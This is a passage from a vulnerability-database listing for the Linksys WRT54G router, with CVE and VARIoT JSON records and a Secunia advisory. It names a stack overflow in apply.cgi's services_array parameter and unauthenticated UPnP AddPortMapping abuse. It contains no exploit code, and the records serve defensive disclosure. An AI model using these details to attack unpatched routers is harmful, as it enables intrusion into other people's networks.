Search criteria
76 vulnerabilities found for wrt54g by linksys
CVE-2024-8408 (GCVE-0-2024-8408)
Vulnerability from cvelistv5 – Published: 2024-09-04 14:00 – Updated: 2024-09-04 14:13
VLAI?
Title
Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow
Summary
A vulnerability was found in Linksys WRT54G 4.21.5. It has been rated as critical. Affected by this issue is the function validate_services_port of the file /apply.cgi of the component POST Parameter Handler. The manipulation of the argument services_array leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Severity ?
6.3 (Medium)
6.3 (Medium)
CWE
- CWE-121 - Stack-based Buffer Overflow
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Credits
Buaa1otTeam (VulDB User)
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:linksys:wrt54g:4.21.5:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "wrt54g",
"vendor": "linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-8408",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-04T14:12:34.563714Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:13:56.158Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"modules": [
"POST Parameter Handler"
],
"product": "WRT54G",
"vendor": "Linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Buaa1otTeam (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Linksys WRT54G 4.21.5. It has been rated as critical. Affected by this issue is the function validate_services_port of the file /apply.cgi of the component POST Parameter Handler. The manipulation of the argument services_array leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Eine kritische Schwachstelle wurde in Linksys WRT54G 4.21.5 ausgemacht. Betroffen davon ist die Funktion validate_services_port der Datei /apply.cgi der Komponente POST Parameter Handler. Durch die Manipulation des Arguments services_array mit unbekannten Daten kann eine stack-based buffer overflow-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 6.5,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121 Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:00:06.823Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-276488 | Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.276488"
},
{
"name": "VDB-276488 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.276488"
},
{
"name": "Submit #398567 | Linksys WRT54G v4.21.5 Command Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.398567"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/BuaaIOTTeam/Iot_Linksys/blob/main/Linksys_WRT54G_validate_services_port.md"
},
{
"tags": [
"product"
],
"url": "https://www.linksys.com/"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-09-04T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-09-04T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-09-04T09:06:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-8408",
"datePublished": "2024-09-04T14:00:06.823Z",
"dateReserved": "2024-09-04T07:01:04.112Z",
"dateUpdated": "2024-09-04T14:13:56.158Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-4499 (GCVE-0-2011-4499)
Vulnerability from cvelistv5 – Published: 2011-11-22 11:00 – Updated: 2024-09-17 02:33
VLAI?
Summary
The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T00:09:18.433Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"name": "VU#357851",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-11-22T11:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"name": "VU#357851",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-4499",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.upnp-hacks.org/devices.html",
"refsource": "MISC",
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"name": "VU#357851",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/357851"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-4499",
"datePublished": "2011-11-22T11:00:00Z",
"dateReserved": "2011-11-22T00:00:00Z",
"dateUpdated": "2024-09-17T02:33:03.064Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-8408 (GCVE-0-2024-8408)
Vulnerability from nvd – Published: 2024-09-04 14:00 – Updated: 2024-09-04 14:13
VLAI?
Title
Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow
Summary
A vulnerability was found in Linksys WRT54G 4.21.5. It has been rated as critical. Affected by this issue is the function validate_services_port of the file /apply.cgi of the component POST Parameter Handler. The manipulation of the argument services_array leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Severity ?
6.3 (Medium)
6.3 (Medium)
CWE
- CWE-121 - Stack-based Buffer Overflow
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Credits
Buaa1otTeam (VulDB User)
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:linksys:wrt54g:4.21.5:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "wrt54g",
"vendor": "linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-8408",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-04T14:12:34.563714Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:13:56.158Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"modules": [
"POST Parameter Handler"
],
"product": "WRT54G",
"vendor": "Linksys",
"versions": [
{
"status": "affected",
"version": "4.21.5"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Buaa1otTeam (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Linksys WRT54G 4.21.5. It has been rated as critical. Affected by this issue is the function validate_services_port of the file /apply.cgi of the component POST Parameter Handler. The manipulation of the argument services_array leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Eine kritische Schwachstelle wurde in Linksys WRT54G 4.21.5 ausgemacht. Betroffen davon ist die Funktion validate_services_port der Datei /apply.cgi der Komponente POST Parameter Handler. Durch die Manipulation des Arguments services_array mit unbekannten Daten kann eine stack-based buffer overflow-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 6.5,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121 Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-04T14:00:06.823Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-276488 | Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.276488"
},
{
"name": "VDB-276488 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.276488"
},
{
"name": "Submit #398567 | Linksys WRT54G v4.21.5 Command Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.398567"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/BuaaIOTTeam/Iot_Linksys/blob/main/Linksys_WRT54G_validate_services_port.md"
},
{
"tags": [
"product"
],
"url": "https://www.linksys.com/"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-09-04T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-09-04T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-09-04T09:06:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "Linksys WRT54G POST Parameter apply.cgi validate_services_port stack-based overflow"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-8408",
"datePublished": "2024-09-04T14:00:06.823Z",
"dateReserved": "2024-09-04T07:01:04.112Z",
"dateUpdated": "2024-09-04T14:13:56.158Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-200605-0265
Vulnerability from variot - Updated: 2024-02-14 23:08Linksys WRT54G Wireless-G Broadband Router allows remote attackers to bypass access restrictions and conduct unauthorized operations via a UPnP request with a modified InternalClient parameter, which is not validated, as demonstrated by using AddPortMapping to forward arbitrary traffic. For example, use AddPortMapping to forward arbitrary traffic. WRT54G v4.0 is prone to a security bypass vulnerability.
TITLE: Linksys WRT54G UPnP Port Mapping Vulnerability
SECUNIA ADVISORY ID: SA20161
VERIFY ADVISORY: http://secunia.com/advisories/20161/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: Armijn Hemel has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to missing authentication of UPnP AddPortMapping requests and missing validation of the InternalClient parameter of the request. This can be exploited by hosts on the local network to configure port forwarding settings on the device to forward incoming traffic to arbitrary hosts without requiring authentication.
Successful exploitation may allow the device to be configured to forward traffic that is received on specific ports on the external interface to another host on the Internet.
SOLUTION: Update to firmware version 1.00.9. http://www.linksys.com/servlet/Satellite?c=L_Download_C2&childpagename=US%2FLayout&cid=1115417109974&packedargs=sku%3D1127782957298&pagename=Linksys%2FCommon%2FVisitorWrapper
PROVIDED AND/OR DISCOVERED BY: Armijn Hemel
ORIGINAL ADVISORY: http://www.securityview.org/how-does-the-upnp-flaw-works.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200605-0265",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.02.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4_non_default"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "4.00.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "wrt54g v5",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "1.42.3"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "2.00.8"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "2.02.7"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "2.04.4"
},
{
"model": "linksys 2.04.4 non default",
"scope": null,
"trust": 0.6,
"vendor": "wrt54g",
"version": null
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "3.01.3"
},
{
"model": "linksys",
"scope": "eq",
"trust": 0.6,
"vendor": "wrt54g",
"version": "3.03.6"
},
{
"model": "wrt54g v5",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wrt54g non default",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.02.04.4"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4_non_default:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.02.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:4.00.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g_v5:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.00.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "87619"
}
],
"trust": 0.3
},
"cve": "CVE-2006-2559",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2006-3375",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-18667",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-2559",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2006-3375",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200605-446",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-18667",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless-G Broadband Router allows remote attackers to bypass access restrictions and conduct unauthorized operations via a UPnP request with a modified InternalClient parameter, which is not validated, as demonstrated by using AddPortMapping to forward arbitrary traffic. For example, use AddPortMapping to forward arbitrary traffic. WRT54G v4.0 is prone to a security bypass vulnerability. \n\nTITLE:\nLinksys WRT54G UPnP Port Mapping Vulnerability\n\nSECUNIA ADVISORY ID:\nSA20161\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/20161/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nArmijn Hemel has reported a vulnerability in Linksys WRT54G, which\ncan be exploited by malicious people to bypass certain security\nrestrictions. \n\nThe vulnerability is caused due to missing authentication of UPnP\nAddPortMapping requests and missing validation of the InternalClient\nparameter of the request. This can be exploited by hosts on the local\nnetwork to configure port forwarding settings on the device to forward\nincoming traffic to arbitrary hosts without requiring authentication. \n\nSuccessful exploitation may allow the device to be configured to\nforward traffic that is received on specific ports on the external\ninterface to another host on the Internet. \n\nSOLUTION:\nUpdate to firmware version 1.00.9. \nhttp://www.linksys.com/servlet/Satellite?c=L_Download_C2\u0026childpagename=US%2FLayout\u0026cid=1115417109974\u0026packedargs=sku%3D1127782957298\u0026pagename=Linksys%2FCommon%2FVisitorWrapper\n\nPROVIDED AND/OR DISCOVERED BY:\nArmijn Hemel\n\nORIGINAL ADVISORY:\nhttp://www.securityview.org/how-does-the-upnp-flaw-works.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2559"
},
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "PACKETSTORM",
"id": "46538"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-2559",
"trust": 2.6
},
{
"db": "SECUNIA",
"id": "20161",
"trust": 2.4
},
{
"db": "SECTRACK",
"id": "1016134",
"trust": 2.0
},
{
"db": "VUPEN",
"id": "ADV-2006-1909",
"trust": 1.7
},
{
"db": "XF",
"id": "26707",
"trust": 0.9
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2006-3375",
"trust": 0.6
},
{
"db": "BID",
"id": "87619",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-18667",
"trust": 0.1
},
{
"db": "PACKETSTORM",
